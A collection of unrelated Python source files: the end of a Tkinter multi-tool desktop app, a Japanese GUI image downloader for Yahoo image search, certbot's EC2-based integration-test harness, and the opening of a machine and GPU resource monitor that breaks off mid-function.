width, height = int(self.widthvar.get()), int(self.heighthvar.get())
resize_img = Image.fromarray(avging)
resize_img = resize_img.resize((width, height))
self.set_img_prop("resized_image" + self.widthvar.get() + "x" + self.heighthvar.get(), resize_img, "N")
elif method == "Create Thumbnail":
if self.heighthvar.get() == "" or self.widthvar.get() == "":
showinfo("message", "Please specify height and width in pixels")
else:
width, height = int(self.widthvar.get()), int(self.heighthvar.get())
thumbnail_img = Image.fromarray(avging)
thumbnail_img.thumbnail((width, height))
self.imgname = "thumbnail_image" + self.widthvar.get() + "x" + self.heighthvar.get()
self.saveimg = thumbnail_img
showinfo("message", "Thumbnail created successfully")
elif method == "Extract Text":
# convert the image to PIL image and further convert it to gray scale image
txtimg=Image.fromarray(avging).convert('L')
pytesseract.pytesseract.tesseract_cmd = 'C:\\Program Files\\Tesseract-OCR\\tesseract.exe'
imgtext = pytesseract.image_to_string(txtimg)
self.imgtotxtvar.set(imgtext)
else:
showwarning("invalid image format", "please select a valid image")
#create root window variable
root=Tk()
# object for root window
windw=Window(root)
# object for homepage tab
home=Homepage(windw.tabControl)
home.set()
home.packwidgets()
#object for dictionary tab
dictionary=Dictionary(windw.tabControl)
dictionary.set()
dictionary.packwidgets()
# object for tranlsate tab
translatetext=TranslateText(windw.tabControl)
translatetext.set()
translatetext.packwidgets()
# object fron bookstore tab
bookstore=BookStore(windw.tabControl)
bookstore.packwidgets()
# object for voice assistant tab
mixer.init()
voiceassistant=VoiceAssistant(windw.tabControl)
voiceassistant.packwidgets()
# object for music player
musicplayer=MusicPlayer(windw.tabControl)
musicplayer.set()
musicplayer.packwidgets()
def on_closing():
musicplayer.stop_music()
home.f=1
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_closing)
# object for imageanalyze
imageanalyze=ImageAnalyze(windw.tabControl)
imageanalyze.set()
imageanalyze.packwidgets()
# set window on top
root.wm_attributes('-topmost', 1)
#run root window
root.mainloop()
|
exsample.py
|
# -*- coding: utf-8 -*-
from concurrent.futures import ThreadPoolExecutor, as_completed
from io import BytesIO
import os
from pathlib import Path
from threading import Thread
from time import sleep
#おまじない
import urllib #URLエンコード用
import bs4 #HTMl解析
import requests #URlアクセス?
import re #正規表現(URL抽出)
import tkinter as tk #GUI
#import ui #GUI作成
class MyFrame(tk.Frame):
def __init__(self, root):
super().__init__(root)
self.pack()
# ロゴ?を表示
# image1 = tk.PhotoImage(file = 'LOGO.gif')
# tk.Label(frame1, image = image1).pack()#.grid(row=0, column=0)
# ※検索キーワードのテキストボックスを作成
self.key_word = tk.StringVar(value='草')
self.txt_key_word = tk.Entry(self, textvariable=self.key_word)
self.txt_key_word.pack()
# 探すボタンを作成
serch = tk.Button(self, text='探す', padx=45, pady=7, command=self.search)
serch.pack()
# 空白
tk.Label(self, text="").pack()
# オプションボタンを作成
option = tk.Button(self, text='設定', padx=44, pady=7) # 微調整しているため、padxの値がちょっとおかしい
option.pack()
# 空白
tk.Label(self, text="").pack()
# バグ連絡
bug = tk.Button(self, text="バグ・要望等連絡", padx=15, pady=7)
bug.pack()
# 空白
tk.Label(self, text="").pack()
# 終了ボタンを作成
owa = tk.Button(self, text="終了", padx=46, pady=7, command=self.owari)
owa.pack()
def search(self):
search_word = self.key_word.get()
# ※画面をブロックさせないためにスレッドを生成して、startを呼び出す。
t = Thread(target=hack, args=(search_word,))
t.start()
def owari(self):
quit()
class DownLoader(object):
def __init__(self):
# ミリ秒に変換
self.interval = 500 / 1000
# sec
self.timeout = 10
self.download_dir = Path('download')
self.download_dir.mkdir(exist_ok=True)
def get(self, url: str, params: dict=None):
# 実際のリクエスト処理はここ
res = requests.get(url, params=params, timeout=self.timeout)
print(res.url)
# http ステータスコードが200番台以外なら例外を発生させる。
# 存在しないwebページをurlに指定すると例外が発生するので分かりやすいかと。
res.raise_for_status()
return res
def get_content(self, url: str, params: dict=None):
sleep(self.interval)
res = self.get(url, params)
return BytesIO(res.content), res.headers['content-type']
def request(self, url_list: list) ->None:
"""
internet -- (Get) --> local
use ThreadPoolExecutor
"""
count = 0
with ThreadPoolExecutor() as executor:
future_to_url = {executor.submit(self.get_content, url): url for url in url_list}
for future in as_completed(future_to_url):
url = future_to_url[future]
try:
# get_contentの戻り値はここで取得
buffer, content_type = future.result()
# 保存対象のファイルかどうか。
if not self.save_content_type(content_type):
continue
# 保存ファイル名はURLのパス部分をそのまま取得
# 重複が発生するので連番を付けたりして対応してくださいな。
file_name = self.download_dir / os.path.basename(url)
print(content_type, file_name)
# 保存
self.save_file(buffer, file_name)
count += 1
except Exception as ex:
print(f"url:{url}, {ex}")
if count == 0:
print(f'save file Empty')
def save_content_type(self, content_type: str) ->bool:
is_saved = ["image/jpeg", "image/png", "image/gif"]
return content_type.lower() in is_saved
def save_file(self, buffer: BytesIO, file_name: Path) ->None:
with file_name.open('wb') as f:
f.write(buffer.getvalue())
# ※Downloaderクラスのインスタンスを生成
dl = DownLoader()
#ダウンロード用(HTML)関数
def hack(search_word: str): #wordeで取得したURLから画像のURLを抜き出す(解析) 使用ライブラリ:bs4
url = 'https://search.yahoo.co.jp/image/search'
params = {'n': '60', 'p': search_word, 'search.x': '1'}
res = dl.get(url, params)
print(res.text)
soup = bs4.BeautifulSoup(res.text, "html.parser") #わかんね
elems = soup.select('a') #aタグを選択
url_list = [] #URLを格納するリストやで
for img in elems: #URL取得やで
url_list.append(img.get('href'))
#print (url_list)
print(url_list)
kazu = (len(url_list)) #判定
#print (kazu)
if kazu == 0: #URL数が0だった時、エラーを出す。
error = "urlzeroerror"
# ※即座に抜けて、if文のネストを減らす
return
tdo = url_list
# ※リスト内の重複を削除
url_list = list(set(url_list))
# ※url_listの内容に対してリクエスト!
dl.request(url_list)
def main() ->None:
root = tk.Tk()
# ウィンドウのタイトルを設定
root.title("フリー画像ダウンローダ -ver1.0_beta")
# ウィンドウの大きさを指定
root.geometry("800x500")
f = MyFrame(root)
root.mainloop()
if __name__ == '__main__':
main()
|
multitester.py
|
"""
Certbot Integration Test Tool
- Configures (canned) boulder server
- Launches EC2 instances with a given list of AMIs for different distros
- Copies certbot repo and puts it on the instances
- Runs certbot tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances, if more
are needed, they need to be requested via online webform.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>python multitester.py targets.yaml MyKeyPair.pem HappyHacker scripts/test_letsencrypt_auto_venv_only.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
from __future__ import print_function
from __future__ import with_statement
import sys, os, time, argparse, socket
import multiprocessing as mp
from multiprocessing import Manager
import urllib2
import yaml
import boto3
import fabric
from fabric.api import run, execute, local, env, sudo, cd, lcd
from fabric.operations import get, put
from fabric.context_managers import shell_env
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
help='profile for AWS (i.e. as in ~/.aws/certificates)')
parser.add_argument('test_script',
default='test_letsencrypt_auto_certonly_standalone.sh',
help='path of bash script in to deploy and run')
#parser.add_argument('--script_args',
# nargs='+',
# help='space-delimited list of arguments to pass to the bash test script',
# required=False)
parser.add_argument('--repo',
default='https://github.com/letsencrypt/letsencrypt.git',
help='certbot git repo to use')
parser.add_argument('--branch',
default='~',
help='certbot git branch to trial')
parser.add_argument('--pull_request',
default='~',
help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
action='store_true',
help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
action='store_true',
help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
default='',
help="server from which to pull candidate release packages")
parser.add_argument('--killboulder',
action='store_true',
help="do not leave a persistent boulder server running")
parser.add_argument('--boulderonly',
action='store_true',
help="only make a boulder server")
parser.add_argument('--fast',
action='store_true',
help="use larger instance types to run faster (saves about a minute, probably not worth it)")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
PROFILE = cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
BOULDER_AMI = 'ami-5f490b35' # premade shared boulder AMI 14.04LTS us-east-1
LOGDIR = "" #points to logging / working directory
# boto3/AWS api globals
AWS_SESSION = None
EC2 = None
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def make_security_group():
# will fail if security group of GroupName already exists
# cannot have duplicate SGs of the same name
mysg = EC2.create_security_group(GroupName="letsencrypt_test",
Description='security group for automated testing')
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=80, ToPort=80)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=443, ToPort=443)
# for boulder wfe (http) server
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=4000, ToPort=4000)
# for mosh
mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
return mysg
def make_instance(instance_name,
ami_id,
keyname,
machine_type='t2.micro',
security_groups=['letsencrypt_test'],
userdata=""): #userdata contains bash or cloud-init script
new_instance = EC2.create_instances(
ImageId=ami_id,
SecurityGroups=security_groups,
KeyName=keyname,
MinCount=1,
MaxCount=1,
UserData=userdata,
InstanceType=machine_type)[0]
# brief pause to prevent rare error on EC2 delay, should block until ready instead
time.sleep(1.0)
# give instance a name
try:
new_instance.create_tags(Tags=[{'Key': 'Name', 'Value': instance_name}])
except botocore.exceptions.ClientError as e:
if "InvalidInstanceID.NotFound" in str(e):
# This seems to be ephemeral... retry
time.sleep(1)
new_instance.create_tags(Tags=[{'Key': 'Name', 'Value': instance_name}])
else:
raise
return new_instance
def terminate_and_clean(instances):
"""
Some AMIs specify EBS stores that won't delete on instance termination.
These must be manually deleted after shutdown.
"""
volumes_to_delete = []
for instance in instances:
for bdmap in instance.block_device_mappings:
if 'Ebs' in bdmap.keys():
if not bdmap['Ebs']['DeleteOnTermination']:
volumes_to_delete.append(bdmap['Ebs']['VolumeId'])
for instance in instances:
instance.terminate()
# can't delete volumes until all attaching instances are terminated
_ids = [instance.id for instance in instances]
all_terminated = False
while not all_terminated:
all_terminated = True
for _id in _ids:
# necessary to reinit object for boto3 to get true state
inst = EC2.Instance(id=_id)
if inst.state['Name'] != 'terminated':
all_terminated = False
time.sleep(5)
for vol_id in volumes_to_delete:
volume = EC2.Volume(id=vol_id)
volume.delete()
return volumes_to_delete
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_http_ready(urlstring, wait_time=10, timeout=240):
"Blocks until server at urlstring can respond to http requests"
server_ready = False
t_elapsed = 0
while not server_ready and t_elapsed < timeout:
try:
sys.stdout.write('.')
sys.stdout.flush()
req = urllib2.Request(urlstring)
response = urllib2.urlopen(req)
#if response.code == 200:
server_ready = True
except urllib2.URLError:
pass
time.sleep(wait_time)
t_elapsed += wait_time
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
"Blocks until server at ipstring has an open port 22"
reached = False
t_elapsed = 0
while not reached and t_elapsed < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipstring, 22))
reached = True
except socket.error as err:
time.sleep(wait_time)
t_elapsed += wait_time
sock.close()
def block_until_instance_ready(booting_instance, wait_time=5, extra_wait_time=20):
"Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
# the reinstantiation from id is necessary to force boto3
# to correctly update the 'state' variable during init
_id = booting_instance.id
_instance = EC2.Instance(id=_id)
_state = _instance.state['Name']
_ip = _instance.public_ip_address
while _state != 'running' or _ip is None:
time.sleep(wait_time)
_instance = EC2.Instance(id=_id)
_state = _instance.state['Name']
_ip = _instance.public_ip_address
block_until_ssh_open(_ip)
time.sleep(extra_wait_time)
return _instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(repo_url):
"clones master of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt'% repo_url)
local('tar czf le.tar.gz letsencrypt')
def local_git_branch(repo_url, branch_name):
"clones branch <branch_name> of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt --branch %s --single-branch'%(repo_url, branch_name))
local('tar czf le.tar.gz letsencrypt')
def local_git_PR(repo_url, PRnumstr, merge_master=True):
"clones specified pull request from repo_url and optionally merges into master"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt'% repo_url)
local('cd letsencrypt && git fetch origin pull/%s/head:lePRtest'%PRnumstr)
local('cd letsencrypt && git checkout lePRtest')
if merge_master:
local('cd letsencrypt && git remote update origin')
local('cd letsencrypt && git merge origin/master -m "testmerge"')
local('tar czf le.tar.gz letsencrypt')
def local_repo_to_remote():
"copies local tarball of repo to remote"
with lcd(LOGDIR):
put(local_path='le.tar.gz', remote_path='')
run('tar xzf le.tar.gz')
def local_repo_clean():
"delete tarball"
with lcd(LOGDIR):
local('rm le.tar.gz')
def deploy_script(scriptpath, *args):
"copies to remote and executes local script"
#with lcd('scripts'):
put(local_path=scriptpath, remote_path='', mirror_local_mode=True)
scriptfile = os.path.split(scriptpath)[1]
args_str = ' '.join(args)
run('./'+scriptfile+' '+args_str)
def run_boulder():
with cd('$GOPATH/src/github.com/letsencrypt/boulder'):
run('go run cmd/rabbitmq-setup/main.go -server amqp://localhost')
run('nohup ./start.py >& /dev/null < /dev/null &')
def config_and_launch_boulder(instance):
execute(deploy_script, 'scripts/boulder_config.sh')
execute(run_boulder)
def install_and_launch_certbot(instance, boulder_url, target):
execute(local_repo_to_remote)
with shell_env(BOULDER_URL=boulder_url,
PUBLIC_IP=instance.public_ip_address,
PRIVATE_IP=instance.private_ip_address,
PUBLIC_HOSTNAME=instance.public_dns_name,
PIP_EXTRA_INDEX_URL=cl_args.alt_pip,
OS_TYPE=target['type']):
execute(deploy_script, cl_args.test_script)
def grab_certbot_log():
"grabs letsencrypt.log via cat into logged stdout"
sudo('if [ -f /var/log/letsencrypt/letsencrypt.log ]; then \
cat /var/log/letsencrypt/letsencrypt.log; else echo "[novarlog]"; fi')
# fallback file if /var/log is unwriteable...? correct?
sudo('if [ -f ./certbot.log ]; then \
cat ./certbot.log; else echo "[nolocallog]"; fi')
def create_client_instances(targetlist):
"Create a fleet of client instances"
instances = []
print("Creating instances: ", end="")
for target in targetlist:
if target['virt'] == 'hvm':
machine_type = 't2.medium' if cl_args.fast else 't2.micro'
else:
# 32 bit systems
machine_type = 'c1.medium' if cl_args.fast else 't1.micro'
if 'userdata' in target.keys():
userdata = target['userdata']
else:
userdata = ''
name = 'le-%s'%target['name']
print(name, end=" ")
instances.append(make_instance(name,
target['ami'],
KEYNAME,
machine_type=machine_type,
userdata=userdata))
print()
return instances
def test_client_process(inqueue, outqueue):
cur_proc = mp.current_process()
for inreq in iter(inqueue.get, SENTINEL):
ii, target = inreq
#save all stdout to log file
sys.stdout = open(LOGDIR+'/'+'%d_%s.log'%(ii,target['name']), 'w')
print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
instances[ii] = block_until_instance_ready(instances[ii])
print("server %s at %s"%(instances[ii], instances[ii].public_ip_address))
env.host_string = "%s@%s"%(target['user'], instances[ii].public_ip_address)
print(env.host_string)
try:
install_and_launch_certbot(instances[ii], boulder_url, target)
outqueue.put((ii, target, 'pass'))
print("%s - %s SUCCESS"%(target['ami'], target['name']))
except:
outqueue.put((ii, target, 'fail'))
print("%s - %s FAIL"%(target['ami'], target['name']))
pass
# append server certbot.log to each per-machine output log
print("\n\ncertbot.log\n" + "-"*80 + "\n")
try:
execute(grab_certbot_log)
except:
print("log fail\n")
pass
def cleanup(cl_args, instances, targetlist):
print('Logs in ', LOGDIR)
if not cl_args.saveinstances:
print('Terminating EC2 Instances and Cleaning Dangling EBS Volumes')
if cl_args.killboulder:
boulder_server.terminate()
terminate_and_clean(instances)
else:
# print login information for the boxes for debugging
for ii, target in enumerate(targetlist):
print(target['name'],
target['ami'],
"%s@%s"%(target['user'], instances[ii].public_ip_address))
#-------------------------------------------------------------------------------
# SCRIPT BEGINS
#-------------------------------------------------------------------------------
# Fabric library controlled through global env parameters
env.key_filename = KEYFILE
env.shell = '/bin/bash -l -i -c'
env.connection_attempts = 5
env.timeout = 10
# replace default SystemExit thrown by fabric during trouble
class FabricException(Exception):
pass
env['abort_exception'] = FabricException
# Set up local copy of git repo
#-------------------------------------------------------------------------------
LOGDIR = "letest-%d"%int(time.time())
print("Making local dir for test repo and logs: %s"%LOGDIR)
local('mkdir %s'%LOGDIR)
# figure out what git object to test and locally create it in LOGDIR
print("Making local git repo")
try:
if cl_args.pull_request != '~':
print('Testing PR %s '%cl_args.pull_request,
"MERGING into master" if cl_args.merge_master else "")
execute(local_git_PR, cl_args.repo, cl_args.pull_request, cl_args.merge_master)
elif cl_args.branch != '~':
print('Testing branch %s of %s'%(cl_args.branch, cl_args.repo))
execute(local_git_branch, cl_args.repo, cl_args.branch)
else:
print('Testing master of %s'%cl_args.repo)
execute(local_git_clone, cl_args.repo)
except FabricException:
print("FAIL: trouble with git repo")
exit()
# Set up EC2 instances
#-------------------------------------------------------------------------------
configdata = yaml.load(open(cl_args.config_file, 'r'))
targetlist = configdata['targets']
print('Testing against these images: [%d total]'%len(targetlist))
for target in targetlist:
print(target['ami'], target['name'])
print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s"%(PROFILE, KEYNAME, KEYFILE))
AWS_SESSION = boto3.session.Session(profile_name=PROFILE)
EC2 = AWS_SESSION.resource('ec2')
print("Making Security Group")
sg_exists = False
for sg in EC2.security_groups.all():
if sg.group_name == 'letsencrypt_test':
sg_exists = True
print(" %s already exists"%'letsencrypt_test')
if not sg_exists:
make_security_group()
time.sleep(30)
boulder_preexists = False
boulder_servers = EC2.instances.filter(Filters=[
{'Name': 'tag:Name', 'Values': ['le-boulderserver']},
{'Name': 'instance-state-name', 'Values': ['running']}])
boulder_server = next(iter(boulder_servers), None)
print("Requesting Instances...")
if boulder_server:
print("Found existing boulder server:", boulder_server)
boulder_preexists = True
else:
print("Can't find a boulder server, starting one...")
boulder_server = make_instance('le-boulderserver',
BOULDER_AMI,
KEYNAME,
machine_type='t2.micro',
#machine_type='t2.medium',
security_groups=['letsencrypt_test'])
try:
if not cl_args.boulderonly:
instances = create_client_instances(targetlist)
# Configure and launch boulder server
#-------------------------------------------------------------------------------
print("Waiting on Boulder Server")
boulder_server = block_until_instance_ready(boulder_server)
print(" server %s"%boulder_server)
# env.host_string defines the ssh user and host for connection
env.host_string = "ubuntu@%s"%boulder_server.public_ip_address
print("Boulder Server at (SSH):", env.host_string)
if not boulder_preexists:
print("Configuring and Launching Boulder")
config_and_launch_boulder(boulder_server)
# blocking often unnecessary, but cheap EC2 VMs can get very slow
block_until_http_ready('http://%s:4000'%boulder_server.public_ip_address,
wait_time=10, timeout=500)
boulder_url = "http://%s:4000/directory"%boulder_server.private_ip_address
print("Boulder Server at (public ip): http://%s:4000/directory"%boulder_server.public_ip_address)
print("Boulder Server at (EC2 private ip): %s"%boulder_url)
if cl_args.boulderonly:
sys.exit(0)
# Install and launch client scripts in parallel
#-------------------------------------------------------------------------------
print("Uploading and running test script in parallel: %s"%cl_args.test_script)
print("Output routed to log files in %s"%LOGDIR)
# (Advice: always use Manager.Queue, never regular multiprocessing.Queue
# the latter has implementation flaws that deadlock it in some circumstances)
manager = Manager()
outqueue = manager.Queue()
inqueue = manager.Queue()
SENTINEL = None #queue kill signal
# launch as many processes as clients to test
num_processes = len(targetlist)
jobs = [] #keep a reference to current procs
# initiate process execution
for i in range(num_processes):
p = mp.Process(target=test_client_process, args=(inqueue, outqueue))
jobs.append(p)
p.daemon = True # kills subprocesses if parent is killed
p.start()
# fill up work queue
for ii, target in enumerate(targetlist):
inqueue.put((ii, target))
# add SENTINELs to end client processes
for i in range(num_processes):
inqueue.put(SENTINEL)
# wait on termination of client processes
for p in jobs:
p.join()
# add SENTINEL to output queue
outqueue.put(SENTINEL)
# clean up
execute(local_repo_clean)
# print and save summary results
results_file = open(LOGDIR+'/results', 'w')
outputs = [outq for outq in iter(outqueue.get, SENTINEL)]
outputs.sort(key=lambda x: x[0])
for outq in outputs:
ii, target, status = outq
print('%d %s %s'%(ii, target['name'], status))
results_file.write('%d %s %s\n'%(ii, target['name'], status))
results_file.close()
finally:
cleanup(cl_args, instances, targetlist)
# kill any connections
fabric.network.disconnect_all()
|
resource_monitor.py
|
import logging
import os
import warnings
from time import time
from threading import Thread, Event
import psutil
from pathlib2 import Path
from typing import Text
from ..binding.frameworks.tensorflow_bind import IsTensorboardInit
try:
from .gpu import gpustat
except ImportError:
gpustat = None
class ResourceMonitor(object):
_title_machine = ':monitor:machine'
_title_gpu = ':monitor:gpu'
def __init__(self, task, sample_frequency_per_sec=2., report_frequency_sec=30.,
first_report_sec=None, wait_for_first_iteration_to_start_sec=180.0,
max_wait_for_first_iteration_to_start_sec=1800., report_mem_used_per_process=True):
self._task = task
self._sample_frequency = sample_frequency_per_sec
self._report_frequency = report_frequency_sec
self._first_report_sec = first_report_sec or report_frequency_sec
self._wait_for_first_iteration = wait_for_first_iteration_to_start_sec
self._max_check_first_iteration = max_wait_for_first_iteration_to_start_sec
self._num_readouts = 0
self._readouts = {}
self._previous_readouts = {}
self._previous_readouts_ts = time()
self._thread = None
self._exit_event = Event()
self._gpustat_fail = 0
self._gpustat = gpustat
self._active_gpus = None
self._process_info = psutil.Process() if report_mem_used_per_process else None
self._last_process_pool = {}
self._last_process_id_list = []
if not self._gpustat:
self._task.get_logger().report_text('TRAINS Monitor: GPU monitoring is not available')
else: # if running_remotely():
try:
active_gpus = os.environ.get('NVIDIA_VISIBLE_DEVICES', '') or \
os.environ.get('CUDA_VISIBLE_DEVICES', '')
if active_gpus:
self._active_gpus = [int(g.strip()) for g in active_gpus.split(',')]
except Exception:
pass
def start(self):
self._exit_event.clear()
self._thread = Thread(target=self._run)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._exit_event.set()
# self._thread.join()
def _run(self):
# noinspection PyBroadException
try:
self._daemon()
except Exception:
pass
def _daemon(self):
seconds_since_started = 0
reported = 0
last_iteration = 0
fallback_to_sec_as_iterations = None
# get max GPU ID, and make sure our active list is within range
if self._active_gpus:
try:
gpu_stat = self._gpustat.new_query()
if max(self._active_gpus) > len(gpu_stat.gpus) - 1:
self._active_gpus = None
except Exception:
pass
# last_iteration_interval = None
# last_iteration_ts = 0
# repeated_iterations = 0
while True:
last_report = time()
current_report_frequency = self._report_frequency if reported != 0 else self._first_report_sec
while (time() - last_report) < current_report_frequency:
# wait for self._sample_frequency seconds, if event set quit
if self._exit_event.wait(1.0 / self._sample_frequency):
return
# noinspection PyBroadException
try:
self._update_readouts()
except Exception:
pass
seconds_since_started += int(round(time() - last_report))
# check if we do not report any metric (so it means the last iteration will not be changed)
if fallback_to_sec_as_iterations is None:
if IsTensorboardInit.tensorboard_used():
fallback_to_sec_as_iterations = False
elif seconds_since_started >= self._wait_for_first_iteration:
self._task.get_logger().report_text('TRAINS Monitor: Could not detect iteration reporting, '
'falling back to iterations as seconds-from-start')
fallback_to_sec_as_iterations = True
elif fallback_to_sec_as_iterations is True and seconds_since_started <= self._max_check_first_iteration:
if self._check_logger_reported():
fallback_to_sec_as_iterations = False
self._task.get_logger().report_text('TRAINS Monitor: Reporting detected, '
'reverting back to iteration based reporting')
clear_readouts = True
# if we do not have last_iteration, we just use seconds as iteration
if fallback_to_sec_as_iterations:
iteration = seconds_since_started
else:
iteration = self._task.get_last_iteration()
if iteration < last_iteration:
# we started a new session?!
# wait out
clear_readouts = False
iteration = last_iteration
elif iteration == last_iteration:
# repeated_iterations += 1
# if last_iteration_interval:
# # to be on the safe side, we don't want to pass the actual next iteration
# iteration += int(0.95*last_iteration_interval[0] * (seconds_since_started - last_iteration_ts)
# / last_iteration_interval[1])
# else:
# iteration += 1
clear_readouts = False
iteration = last_iteration
else:
# last_iteration_interval = (iteration - last_iteration, seconds_since_started - last_iteration_ts)
# repeated_iterations = 0
# last_iteration_ts = seconds_since_started
last_iteration = iteration
fallback_to_sec_as_iterations = False
clear_readouts = True
# start reporting only when we figured out, if this is seconds based, or iterations based
average_readouts = self._get_average_readouts()
if fallback_to_sec_as_iterations is not None:
for k, v in average_readouts.items():
# noinspection PyBroadException
try:
title = self._title_gpu if k.startswith('gpu_') else self._title_machine
# 3 points after the dot
value = round(v * 1000) / 1000.
self._task.get_logger().report_scalar(title=title, series=k, iteration=iteration, value=value)
except Exception:
pass
# clear readouts if this is update is not averaged
if clear_readouts:
self._clear_readouts()
# count reported iterations
reported += 1
def _update_readouts(self):
readouts = self._machine_stats()
elapsed = time() - self._previous_readouts_ts
self._previous_readouts_ts = time()
for k, v in readouts.items():
# cumulative measurements
if k.endswith('_mbs'):
v = (v - self._previous_readouts.get(k, v)) / elapsed
self._readouts[k] = self._readouts.get(k, 0.0) + v
self._num_readouts += 1
self._previous_readouts = readouts
def _get_num_readouts(self):
return self._num_readouts
def _get_average_readouts(self):
average_readouts = dict((k, v / float(self._num_readouts)) for k, v in self._readouts.items())
return average_readouts
def _clear_readouts(self):
self._readouts = {}
self._num_readouts = 0
def _machine_stats(self):
"""
:return: machine stats dictionary, all values expressed in megabytes
"""
cpu_usage = [float(v) for v in psutil.cpu_percent(percpu=True)]
stats = {
"cpu_usage": sum(cpu_usage) / float(len(cpu_usage)),
}
bytes_per_megabyte = 1024 ** 2
def bytes_to_megabytes(x):
return x / bytes_per_megabyte
virtual_memory = psutil.virtual_memory()
# stats["memory_used_gb"] = bytes_to_megabytes(virtual_memory.used) / 1024
stats["memory_used_gb"] = bytes_to_megabytes(
self._get_process_used_memory() if self._process_info else virtual_memory.used) / 1024
stats["memory_free_gb"] = bytes_to_megabytes(virtual_memory.available) / 1024
disk_use_percentage = psutil.disk_usage(Text(Path.home())).percent
stats["disk_free_percent"] = 100.0 - disk_use_percentage
with warnings.catch_warnings():
if logging.root.level > logging.DEBUG: # If the logging level is bigger than debug, ignore
# psutil.sensors_temperatures warnings
warnings.simplefilter("ignore", category=RuntimeWarning)
sensor_stat = (psutil.sensors_temperatures() if hasattr(psutil, "sensors_temperatures") else {})
if "coretemp" in sensor_stat and len(sensor_stat["coretemp"]):
stats["cpu_temperature"] = max([float(t.current) for t in sensor_stat["coretemp"]])
# update cached measurements
net_stats = psutil.net_io_counters()
stats["network_tx_mbs"] = bytes_to_megabytes(net_stats.bytes_sent)
stats["network_rx_mbs"] = bytes_to_megabytes(net_stats.bytes_recv)
io_stats = psutil.disk_io_counters()
stats["io_read_mbs"] = bytes_to_megabytes(io_stats.read_bytes)
stats["io_write_mbs"] = bytes_to_megabytes(io_stats.write_bytes)
# check if we can access the gpu statistics
if self._gpustat:
try:
stats.update(self._get_gpu_stats())
except Exception:
# something happened and we can't use gpu stats,
self._gpustat_fail += 1
if self._gpustat_fail >= 3:
self._task.get_logger().report_text('TRAINS Monitor: GPU monitoring failed getting GPU reading, '
'switching off GPU monitoring')
self._gpustat = None
return stats
def _check_logger_reported(self):
titles = self.get_logger_reported_titles(self._task)
return len(titles) > 0
@classmethod
def get_logger_reported_titles(cls, task):
titles = list(task.get_logger()._get_used_title_series().keys())
try:
titles.remove(cls._title_machine)
except ValueError:
pass
try:
titles.remove(cls._title_gpu)
except ValueError:
pass
return titles
def _get_process_used_memory(self):
def mem_usage_children(a_mem_size, pr, parent_mem=None):
self._last_process_id_list.append(pr.pid)
# add out memory usage
our_mem = pr.memory_info()
mem_diff = our_mem.rss - parent_mem.rss if parent_mem else our_mem.rss
a_mem_size += mem_diff if mem_diff > 0 else 0
# now we are the parent
for child in pr.children():
# get the current memory
m = pr.memory_info()
mem_diff = m.rss - our_mem.rss
a_mem_size += mem_diff if mem_diff > 0 else 0
a_mem_size = mem_usage_children(a_mem_size, child, parent_mem=m)
return a_mem_size
# only run the memory usage query once per reporting period
# because this memory query is relatively slow, and changes very little.
if self._last_process_pool.get('cpu') and \
(time() - self._last_process_pool['cpu'][0]) < self._report_frequency:
return self._last_process_pool['cpu'][1]
# if we have no parent process, return 0 (it's an error)
if not self._process_info:
return 0
self._last_process_id_list = []
mem_size = mem_usage_children(0, self._process_info)
self._last_process_pool['cpu'] = time(), mem_size
return mem_size
def _get_gpu_stats(self):
if not self._gpustat:
return {}
# per process memory query id slow, so we only call it once per reporting period,
# On the rest of the samples we return the previous memory measurement
# update mem used by our process and sub processes
if self._process_info and (not self._last_process_pool.get('gpu') or
(time() - self._last_process_pool['gpu'][0]) >= self._report_frequency):
gpu_stat = self._gpustat.new_query(per_process_stats=True)
gpu_mem = {}
for i, g in enumerate(gpu_stat.gpus):
# only monitor the active gpu's, if none were selected, monitor everything
if self._active_gpus and i not in self._active_gpus:
continue
